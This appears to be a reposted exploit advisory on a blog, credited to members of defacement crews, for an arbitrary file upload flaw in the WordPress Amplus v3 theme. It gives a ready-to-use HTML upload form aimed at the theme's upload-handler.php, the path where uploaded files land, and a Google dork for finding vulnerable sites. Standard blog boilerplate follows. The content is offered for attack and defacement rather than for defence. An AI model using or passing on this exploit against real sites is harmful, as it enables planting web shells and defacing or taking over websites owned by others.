WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability ~ INFORMASI TERLENGKAP

Thursday, November 21, 2013

WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability

By Unknown on 3:34 AM

#############################

# Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability

# Author: Bebyyers404

# Date: 11/17/2013

# Infected Version: v3.x.x

# Infected File: upload_handler.php

# Category: webapps/php

# Google dork: inurl:/wp-content/themes/Amplus_v3

##############################

#POC & EXPLOIT

<form enctype="multipart/form-data"

action="http://127.0.0.1/wordpress/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post">

<input type="jpg" name="url" value="./" /><br />

Please choose a file: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

#File path:

http://site.com/wordpress/wp-content/uploads/[FILE]

or

http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE]

###################################################################### 

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

Defacing

About Syed Faizan Ali

Faizan is a 17 year old young guy who is blessed with the art of Blogging,He love to Blog day in and day out,He is a Website Designer and a Certified Graphics Designer.

INFORMASI TERLENGKAP

Thursday, November 21, 2013

WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability

About Syed Faizan Ali

Join us on Facebook

Followers

Labels

Histats

Alexa